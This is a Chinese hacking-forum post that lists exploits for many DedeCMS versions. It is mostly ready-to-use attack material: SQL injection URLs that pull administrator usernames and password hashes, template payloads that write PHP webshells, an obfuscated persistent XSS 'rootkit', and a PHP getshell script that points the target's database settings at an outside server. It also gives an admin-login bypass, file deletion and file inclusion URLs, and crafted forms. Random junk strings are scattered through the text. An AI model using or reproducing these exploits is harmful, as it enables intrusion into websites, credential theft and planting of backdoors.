找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3083|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
5 b$ `# _: L) v
Dedecms 5.6 rss注入漏洞
9 _. b* S1 {9 n' ?
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=16 S5 w" Q: n# {; q# ?

2 B/ G* n# S. ?/ z! T, L
1 K1 `2 R4 I: O, b; j/ i1 H
+ g/ {1 j4 l# m" \: m) Z2 ^
( f7 w1 I( j7 {, O
: Q* d# N! ~9 Y3 o' H5 W4 J# p" `# E: Y7 p/ I3 K
  P8 V% Y( A; P

2 {, X. {8 v' ^3 RDedeCms v5.6 嵌入恶意代码执行漏洞% a1 b& A2 C9 A9 [
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
2 J  H: o/ U* }- s发表后查看或修改即可执行  D3 U/ N6 G! Q
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}9 \) z( o4 u4 C7 h+ v
生成x.php 密码xiao,直接生成一句话。
- I* s: G4 X2 @4 w) w( V* @0 V" [# w( l# b" u5 C2 j
; g  \2 P- n" q1 r4 q

  X9 ?" j' Y$ Z5 I0 p0 `7 |+ A, i  S

4 u+ ]' _$ f4 P4 o, I8 V8 y1 r; D
, Y2 C( q. U. F6 C; N/ X8 B& C  m" q% d
7 |2 z! r0 v$ W9 k" H
Dede 5.6 GBK SQL注入漏洞# a5 J3 ^4 f  o) u; g+ w- o
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
7 b' L$ `* t  A
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
9 Z- p; t/ O. U% O, nhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
: i1 {/ I& w7 i' K
! l2 w, r6 r8 a
% j/ g4 T% j- |$ @) x6 T5 M# {# e& q5 k0 @" S% i+ H1 w

  u1 \' ~% ^/ Q$ Y
2 o$ ^) n) I! q8 E
+ _+ g! [3 y7 p% y9 @: b# l( [* z- }2 {( w( p3 O
, z3 u9 Y+ _/ @4 w6 L) Z2 m$ k
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
7 L6 u6 ^5 h* ^) B
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
( }% D0 H2 Q4 I: g) o* }9 z. k& n: \

: W1 j" A/ ?' H) `/ J2 }7 G) c' u, Y  p! ^3 V- g& P# o! K9 B

  D  V) i6 r) N1 ?2 q
# U% |4 x% M1 i+ t1 |# o( D. w) Z
+ u' Q% ?* }1 t5 J# A1 S0 d+ |DEDECMS 全版本 gotopage变量XSS漏洞
, J# F+ [) T! W6 v$ l1 \1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
& x) S) ]3 i- b9 E
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="! u! q' |, N& b, L8 d! o! p

: Q1 d; m' w' d- o( ~, P( A" x) {# M& q, F2 U% b
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
3 g" ~/ q! T) M9 Y& v
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
1 h2 p5 C' h5 ?  h, D5 \& _& C. Q0 Z2 I2 e( o9 R; w
) b2 j% {5 ^; x  T1 ^* V+ x
http://v57.demo.dedecms.com/dede/login.php# Q9 C# k- I' Y. w+ _2 L
: W) [) d$ f: |$ Q7 ]; x

% D# H% H9 z" M* x3 e6 S$ Acolor=Red]DeDeCMS(织梦)变量覆盖getshell
; [, i( z8 M. a$ u" p# E#!usr/bin/php -w+ `; a2 \7 ~2 q' o* y: O. X9 U/ S
<?php
1 M+ ^  X* R+ [+ z9 E9 W" s: rerror_reporting(E_ERROR);
5 g! r, w7 r, t1 X% Oset_time_limit(0);. u& Y% O1 [5 P. s8 G( O! L- d
print_r('
% g7 L' e2 R4 F- p: i6 kDEDEcms Variable Coverage
+ u1 o) y6 S3 x& f5 ~9 zExploit Author:
www.heixiaozi.comwww.webvul.com4 e- x! g- R. T/ H1 f8 s) h& z& |
);
: W; C5 t% G, I5 x1 T# B/ Y% cecho "\r\n";
# p% A: f* w" v9 g6 \if($argv[2]==null){! k' l$ J0 G4 u" b0 r* \6 @6 `
print_r('
: k$ D; \# k- `- B$ j9 R+---------------------------------------------------------------------------+
  ^* b& E4 T: P& T. [6 L) `: }Usage: php '.$argv[0].' url aid path* J; a6 [. y6 F- W
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
6 u: ?7 X/ |' _3 z- m8 AExample:! C0 M9 `0 [  u
php '.$argv[0].'
www.site.com 1 old* n8 R! X9 H3 A0 U) }7 l& }
+---------------------------------------------------------------------------+
% B$ ^( |0 J6 U4 Q9 c');
- _' @7 T0 a+ texit;
+ T; T) ]% e& o- G: W5 p0 g1 W8 n}" I6 S" l" S* N/ k7 T3 w, U3 l
$url=$argv[1];2 a3 T% b" D' J2 B# a$ b
$aid=$argv[2];1 ^. Y+ r2 w5 ]% Q
$path=$argv[3];
" h& J- Z$ x  I2 r: D$exp=Getshell($url,$aid,$path);) M; d, L2 U% T' }$ S( V+ Y
if (strpos($exp,"OK")>12){
0 ]6 a3 Q3 p$ |" `' J# Hecho "& U9 ], T/ ~; X" Z7 t7 i) t
Exploit Success \n";
3 i1 b5 [4 J- K! t$ x! n9 o, Tif($aid==1)echo "
  R5 m  Y  s  C' x. O! cShell:".$url."/$path/data/cache/fuck.php\n" ;
! x# G& v' A" t; t  V& U$ _- N0 B, ]
9 |9 ?, [0 N1 i( \9 e$ j
  J5 o4 T6 ~9 c1 O0 qif($aid==2)echo ") W3 d3 L; H* c3 F( s
Shell:".$url."/$path/fuck.php\n" ;
. F  s: G8 `: N0 b% X( V; _( v! v# |9 A: Z- D0 T5 |

7 Z0 I, _7 i2 H  k% ?+ u" k8 S9 zif($aid==3)echo "
+ {$ r' K8 Y+ }( [1 w4 A5 JShell:".$url."/$path/plus/fuck.php\n";* O% I2 b& U) N4 F; E: q# W
- v" `, r8 J' |3 u
2 a$ I; }" [/ A6 J* p. |8 s
}else{
4 V& d/ ?  @7 A) a) necho "
; \) ]2 r9 Y) W/ |$ `) kExploit Failed \n";
8 R6 l. {1 B: m! {8 k& \}
  R7 O  x8 a8 n. U) V; o& vfunction Getshell($url,$aid,$path){  [  k5 e' J9 {  c% d* h
$id=$aid;5 i' @3 _7 }: {) i, d- `
$host=$url;
# B6 I1 d  u% h5 ?. n$port="80";- n) v$ Y* t1 Y& E6 _+ O
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";" _2 f* `+ A8 z
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";" u: C) W& z/ Y! ~2 u) @
$data .= "Host: ".$host."\r\n";) x; w- @+ N* a4 P' I* l4 M
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
' I1 w# i& Z: p$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";. u1 h2 A$ b3 q  r( A, S$ d
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";& U1 x) K% I* `" _8 C2 U+ q; U
//$data .= "Accept-Encoding: gzip,deflate\r\n";
/ f  r  }/ {0 \! @/ _% Z$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
- J3 d/ s  d  H8 i) s1 S$data .= "Connection: keep-alive\r\n";; f) I& X& q0 m) a1 N) v% p
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
! p1 A3 i) j& s1 R' x! f5 [' c: @$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
8 M- v& |9 K4 W, C6 |" C$data .= $content."\r\n";2 a* S9 M' {* |: b
$ock=fsockopen($host,$port);
) K% o3 G( Z) [% |( uif (!$ock) {  E  [0 u8 J8 S- U5 d7 @' j
echo "
, c/ K0 p8 o" y! b; Q. c  ]6 h8 u. M' b* UNo response from ".$host."\n";
4 X( L" g. h+ j  y" l' X9 u}& F2 v2 B; v8 ]
fwrite($ock,$data);
) w0 o3 m% S2 l, ?while (!feof($ock)) {
; y* w+ f! B0 B& A3 x$ e$exp=fgets($ock, 1024);+ s% {) A- x' K& s4 s5 Y: b3 B0 e: c
return $exp;/ r) s- c3 a4 K! T
}9 R0 S) }, b; X, p
}
, m: b" t* T8 }5 A: W# w" t/ u+ j  k* S7 \. b7 }
% V( D+ h  }, g. N; @1 |! K% M
?>
( N* E3 Y" x! _' |+ k7 S$ A( |( ^7 t( T
$ l5 a8 z8 T6 B0 w: d" n

2 x5 @$ C% ?& |! t# ~8 }5 E! {% x. g7 A7 V$ W
/ W% [7 Z6 c/ j( w6 g6 Q  Z

$ A+ ~8 t0 ~! Z2 [8 \( i) y8 \
! Q. A* H4 z- q+ K* S# W8 w- X2 |# P9 m: j7 _2 c& t% |* X

, O* Z: g3 N; S2 S( ~. f; h
( V# @7 c8 E; H2 v6 iDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
8 ]1 |' X4 P( w+ P
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
6 _- T  g( D+ `; F8 I" j  C) [
6 B% |2 d& f/ ^+ K+ S. b% r  a' d0 g2 Z, S
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
" W2 ~' I/ ^  p6 ]) u4 P3 B( X; w2 d! B

$ F/ p( p- u. V7 Y5 U1 y5 t此漏洞的前提是必须得到后台路径才能实现  t- n4 o; E' Z

* I9 i! T+ v4 s/ I" K
* J) O* g9 y. D# S1 F
6 `6 d7 t0 o* D( Q3 H) D/ ]  o0 Z* i9 t
/ D5 [4 j2 n+ O2 J' [  o+ n9 X

; t# w. E) q/ s/ V
  X4 A) p2 O) g; ^# q3 M. \/ p/ s, c& H5 X5 {9 E

* a7 m( W1 K: @# K7 l" @, S) V; W) i" F- d
Dedecms织梦 标签远程文件写入漏洞- \1 K$ z4 A  }. Y
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
1 |! b0 i2 Q1 f0 [. d9 d9 ?; i( W& D1 Z

* E3 I2 n, a- \- z: z1 ~$ [再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 + v' e+ {  [. g, i, I/ Y
<form action="" method="post" name="QuickSearch" id="QuickSearch">
  U1 {+ C. g% g# j  Q# C( a<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
  X$ D4 F+ w6 |- \3 h<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
+ s4 v7 g) y4 V5 T<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
$ K1 n, W& G) U0 |8 }6 K<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
% r$ s8 _2 r( `, e/ Q) o1 ~<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />2 Z$ }& ~  T7 P6 q& r" s  e* b
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />& d' v- Q3 [7 u9 b  v' v5 ]2 V0 d
<input type="text" value="true" name="nocache" style="width:400">
& l( p5 }2 y' c) v+ _<input type="submit" value="提交" name="QuickSearchBtn"><br />  M  V* n( s& J6 N8 y. [9 d
</form>7 `/ V4 H4 a5 c( Q$ w5 Y. C+ S9 g
<script>
* z" f! b- j5 k8 lfunction addaction()7 V% D. X! v+ ?5 C$ i1 r
{
( a  {  s# N, k  T0 N3 g* H* Kdocument.QuickSearch.action=document.QuickSearch.doaction.value;0 {. s+ s# p5 i+ v- G
}
3 l; _  _; K3 G/ w8 c</script>0 U1 L3 O5 Z4 v  {( B3 ^7 U

1 L4 l9 w3 K$ j$ w; C- d6 h$ F! q9 v- P3 p: r1 Z# V8 ]
" m; R* N" ~  u1 X& k

+ f- r$ q) q4 f7 K- J4 @8 {9 |8 o( ^# u

$ J: R8 g* J3 T# f, r
/ X* v$ J0 F2 E" X: x- w7 c: D
: d: N& Z6 M: F, X! |3 ^- F: r! m, X! u( c  B. u# m

8 _$ c2 o! p2 v/ U# }DedeCms v5.6 嵌入恶意代码执行漏洞# n4 _% G; J3 h
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行- a8 j- x+ M, N( ~$ X8 n: S% j
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}3 m# g9 P. {; o) U. I! M
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得7 {5 u7 C" \/ b( k* y+ E) O
Dedecms <= V5.6 Final模板执行漏洞, O7 ^8 _9 C6 y! c
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
" Y$ E  c" n8 B0 h& Z  s' x' ]uploads/userup/2/12OMX04-15A.jpg1 A3 v5 M. G& x. e9 f* T
; S- d0 d( w( S8 g3 i& `; F# r
7 ]# s$ f* m; v/ C6 U( y
模板内容是(如果限制图片格式,加gif89a):
' G: E2 \3 [$ e; }{dede:name runphp='yes'}# }4 N+ Y" B% }9 E  o/ O
$fp = @fopen("1.php", 'a');
8 r! O; ~2 j7 i8 O@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");& n4 q. H3 r4 m0 \
@fclose($fp);
9 X% [; N, s8 e* c2 M/ P( d4 ^! j{/dede:name}
6 U8 I& h- ^4 j4 ]3 O- O% A* v2 修改刚刚发表的文章,查看源文件,构造一个表单:- V5 p5 P7 g( A
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">" {& O5 O) N0 u* E& |
<input type="hidden" name="dopost" value="save" />- e, f- d' V0 i3 O3 f
<input type="hidden" name="aid" value="2" />
( X& c, q( z6 [' Q3 R; e<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
3 ^( z9 ]8 h& r$ z! y$ ?2 Z5 L' [<input type="hidden" name="channelid" value="1" />5 ?$ l/ p# b0 ]
<input type="hidden" name="oldlitpic" value="" />
' f* E$ u+ m- A$ N- H<input type="hidden" name="sortrank" value="1275972263" />( v) \) h! x9 ?7 ]9 z: }

7 z0 {% {7 S$ F, P4 C4 n8 l6 l5 P$ Q/ d
3 E( \+ [% w+ c) ]<div id="mainCp">8 d1 s+ ^. ^1 K/ b+ H5 E! s& ]# E& v
<h3 class="meTitle"><strong>修改文章</strong></h3>: B  @. C3 E' Q2 E
& u4 n) Q& c; [$ j) Z

* l; s2 f* F; b+ h9 F<div class="postForm">
( A$ _2 @3 f6 B6 n<label>标题:</label>8 t  O) X& |4 k/ E2 k
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
+ T5 a) ]) ]9 s; y  e' l, F+ @7 D) o0 H$ s

6 m1 j2 S& }3 L" J2 k5 F3 _% v# ]4 k2 A<label>标签TAG:</label>
- V# I0 x0 E* x1 L! ]+ ~' M" y0 m<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)% i1 ^3 Q" C2 z, F( R! L
8 `& R: ~, ]2 T$ u, ^  ?# x
; A: _3 D$ o9 z& X. \
<label>作者:</label>' }" z; I/ Y$ h
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
/ f- i$ g, ^4 O% Q3 m1 c9 [' A
/ ^4 T7 u- u( h3 ^9 H4 t
. y" j$ k' E6 Q<label>隶属栏目:</label>
4 C( M% A$ O6 s# r  n2 j<select name='typeid' size='1'>
3 ], O% I5 H) V& B4 e8 c<option value='1' class='option3' selected=''>测试栏目</option>. ?/ u+ U: O% e* X9 Q
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)& a! p; ^! V/ o# z! e. @5 e# d% r

" j9 G6 n: p5 G; i- Z+ A
* H/ c& k0 F8 K5 Q- j; u- Z<label>我的分类:</label>
; s* l& e" O7 `<select name='mtypesid' size='1'>4 D- C0 D! S( {+ T) s5 L4 ?
<option value='0' selected>请选择分类...</option>
1 p% q# s- B. u, [) A<option value='1' class='option3' selected>hahahha</option>
9 _2 |9 `4 d, e* ]3 f</select>3 T6 N! p/ }# B1 X/ A6 u  n; @) a

- O  P4 R# d6 Q+ D3 \) m
& d% H, b6 Y( a1 l& Y4 `4 _  E<label>信息摘要:</label>
! s6 V& D" l, k<textarea name="description" id="description">1111111</textarea>
# e) w5 ^. z( f  m(内容的简要说明)
! G: V1 J! {  w, Q3 b2 G( j: l+ M9 E/ \6 k
" b0 A: U8 N, \' s
<label>缩略图:</label>
" s2 M8 O8 z' f8 L! ~4 ~<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
+ q/ j! L3 T1 g/ ]8 ]+ n+ S/ R% m! B; K$ h

. a# N  ~3 r' b& m/ O" e<input type='text' name='templet'. Q* o: J+ @7 P$ L
value="../ uploads/userup/2/12OMX04-15A.jpg">
/ ?2 m0 I/ x- y' p<input type='text' name='dede_addonfields') j  Q8 x5 y4 J$ k( A: m
value="templet,htmltext;">(这里构造)2 d4 s; @1 T7 Z8 U/ A4 O
</div>
# K5 w4 p) U" L' B: O8 ?/ I& x1 U0 d6 g9 w! k, w7 R
7 N$ J3 v* R+ m
<!-- 表单操作区域 -->
3 B  j6 h& ~- c$ M, v<h3 class="meTitle">详细内容</h3>5 v5 @) k0 a2 B) P/ L- n

$ M1 U. u$ ~) W: s9 i/ s
- a4 G# L9 u! G  A+ P  ~9 w+ R/ \<div class="contentShow postForm">
4 D0 S8 J2 v/ p3 |% Q; g, G<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>" j: W5 V2 u5 z, c$ c
& B; T1 ?* e- W5 C
  n5 H$ H( W( J" a  t" L
<label>验证码:</label>7 P9 x; m; A1 G- f
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
. _, g% G5 A( l" O+ h! D<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
& S) R; E  R5 r% Q6 E
! f6 k0 p  u# b% W  }5 r4 O7 ?9 s- n' k
<button class="button2" type="submit">提交</button>
$ x/ l, c" L/ e' ~: H0 [% j<button class="button2 ml10" type="reset">重置</button>' \+ F2 |" P- v* x. u
</div>8 |- ?' C5 d% M1 }: ]4 r

/ r0 I' D; R# ^0 V3 F6 y' m, N1 o6 R/ ^6 J) ~* Q
</div>, ~# P9 h! f4 A3 X, F3 q8 J3 Y4 T
% D1 s# `% j6 B# G1 ^/ Z: w

- R; r0 Z: H8 S& [5 o( e</form>/ Y. i: w& a& i4 p* U
3 i5 D  d! b$ [' s' L. `
1 e0 T( S8 Q! j0 J3 F" B
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:: @0 p# R$ @- G2 z
假设刚刚修改的文章的aid为2,则我们只需要访问:* M) ]/ ~) h9 P
http://127.0.0.1/dede/plus/view.php?aid=25 x8 u) B. O0 x5 u: y' E
即可以在plus目录下生成webshell:1.php
* H% m: D5 w) O4 e4 \: t: q, m# U( `% C- g) {! _0 O6 e

% @) H# j9 g, R, o8 u& j% T9 B6 F
* J% ]2 j4 x; N/ H4 U1 E
% R2 E6 l5 m9 s  D

2 u( F+ X( [, l. o
/ C. }' T* D  H# I  E' f* Q
2 ^7 B1 _$ H) L. t4 t( k  r4 m  `) v- M# U$ n4 V
; d. U  |. [5 W7 x
6 }# A+ g7 P8 A4 N" r
6 r& s- n0 O8 S7 }
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
8 {7 h) J, z" @Gif89a{dede:field name='toby57' runphp='yes'}
: L2 k9 _- B# `9 B" \phpinfo();( D" Z$ D% }  }# O6 n' r2 f
{/dede:field}
# m9 e4 J8 B$ J5 [" v+ w保存为1.gif+ g: L+ T8 n6 I! s6 O* @0 s
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
; }% p5 |4 t! K6 q4 C2 z, R5 k<input type="hidden" name="aid" value="7" /> ) x6 r2 G# \  Z5 O
<input type="hidden" name="mediatype" value="1" />
; M. y) ~$ F6 R: t<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> % _7 t% r7 D# _( b: T
<input type="hidden" name="dopost" value="save" />
6 c& X+ ^6 ^4 [- g5 b. K2 |<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
& N0 h3 L$ k. D6 |" [* ^6 E7 [<input name="addonfile" type="file" id="addonfile"/> . N$ s& F0 R: m0 h, T. j, q
<button class="button2" type="submit" >更改</button> 0 B; N1 Z; B5 n
</form>
. T6 Y8 |2 J: L  Z0 c
& \8 D4 D& m# Q; z) G# L7 m. j6 M6 d7 [, A9 I
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif- T+ A9 Q/ A7 i- V* K( B7 P  M
发表文章,然后构造修改表单如下:
) V) r0 K1 E* y( c* i( p3 F. G  _" V% Y  [* a8 D

, x) H! m* l) V6 Z0 a6 |<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> - M1 V7 E) d( t( R
<input type="hidden" name="dopost" value="save" />
& p' q% Q% A' |' [! a2 e) J<input type="hidden" name="aid" value="2" /> ; s) O$ O- r- s' @0 r0 B
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
& p5 m$ s5 ]1 }+ R# H4 N8 {# M<input type="hidden" name="channelid" value="1" />
2 W1 P8 |% h* J* a' d<input type="hidden" name="oldlitpic" value="" /> ; m/ p/ O# l+ _, d) @6 ?" f
<input type="hidden" name="sortrank" value="1282049150" /> * K, k1 _& B9 Y' z! C7 e( G: O
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
- r! ^4 c( Z0 i$ x: J/ M) X9 Y<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> " l2 ^6 h. W4 D: S( p5 f, j
<select name='typeid' size='1'>
" m5 H! k; E! ^<option value='1' class='option3' selected=''>Test</option>
" q7 W7 l  P1 e0 n5 h<select name='mtypesid' size='1'>
  O. {" G$ P, R9 y3 l<option value='0' selected>请选择分类...</option> $ W9 _# s( B5 R
<option value='1' class='option3' selected>aa</option></select>
7 N9 [1 s! z7 T9 V7 l* k<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> $ c2 V5 a3 M, R" s: X7 N0 R% c- ?
<input type='hidden' name='dede_addonfields' value="templet">
7 i3 E- H, t  j9 ~% s<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> / \5 K8 S9 H6 f! X* t4 \3 e' _
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
6 U* z* |' y* F5 `* Q* s( b<button class="button2" type="submit">提交</button> 6 c1 X, c; n  t, A! b% A* ~$ I: j$ d
</form>
2 W& ^/ l5 w3 U4 y' f
  T9 @: P( s" s5 }* t5 S  v8 H$ K2 ~
0 B! }6 a6 r3 b& s* T: q9 {& ?" h% w1 c+ z2 a+ u6 ~/ i( T8 m

: V, X. Y% Z$ }4 o, o3 S; `" p" F1 C7 y3 U
# S; b: [" m' t0 a4 C* L. n' N

( d5 G; w$ W% f$ F( q1 d! E
  D9 V) p+ Q: }( _+ V- ~6 R) ~1 [6 q
* f* `$ T# _+ P1 {2 r  z# ^

$ h, E( [! r8 m0 h
: p- B; N' |7 \6 A5 H/ D+ @织梦(Dedecms)V5.6 远程文件删除漏洞4 E- X! |5 F  ]9 o' P( a$ t, @
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif% m' l; w  U. j* v
- W( G" M8 }8 h! W
- y! x+ i" r/ m8 \' j5 }# D

6 Y7 ^& P% G9 z$ Y. d
& C! A: Q+ h6 R% P; t1 Z  _* P
$ |; ]7 L1 x8 X6 M* C. J* u- ~
! L( l' l/ [2 i7 R5 h2 x( Z( x- v$ s

( ?3 P2 U2 v% M/ P  a. X# F- H" a! o, w

4 ^( n( }! a" [: k" Y织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 , k* B& d' o# M: s* {0 j
http://www.test.com/plus/carbuya ... urn&code=../../
* i' V- Q3 d# ^% o4 T
% O$ V& s! Y8 K, ?" g8 \( L
5 L* `8 [6 H  X$ p; [% T8 a! S( @$ f, A$ e

' Q0 ]3 W5 ]" S4 e7 X
( s1 F6 j+ m! v$ G  h! J2 I. w0 t8 x, L9 P2 U7 y1 l* P+ z
* i# e1 j  [1 a" ?# [$ d) y
4 G3 ?3 B, J4 @1 j: r2 O
6 Z8 c; g: e/ {2 C% T

( s5 a1 r# V" u" m5 J- ~DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ' V4 I. i: y% }! v& H
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
( [- r" ?0 ^- S4 E5 Y密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5; o9 v. q+ @1 O5 \7 \' ~+ H

8 ^' G' b; ]5 Q# r" @0 R$ R
# A+ w* }# \8 }: U1 i) B6 ~7 V* o6 J  u1 z$ v7 [5 C. L5 O* j
- ?% D- [' F9 _" j0 M
' H* t3 ~  @+ M! F, {0 S

9 v. K1 @+ E( a. `' G
6 A% d( p# c3 }6 a/ U. F/ e
2 ~( L+ m) a, B, v' m- R- R" m, b: f& j3 p

: }  ]7 Z' ~; _: c3 m织梦(Dedecms) 5.1 feedback_js.php 注入漏洞* U5 n  S4 Q. m* W7 R. O& x2 r
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
9 P0 u  P7 Y+ V6 p2 z
6 a$ J$ O3 g& _# {6 f
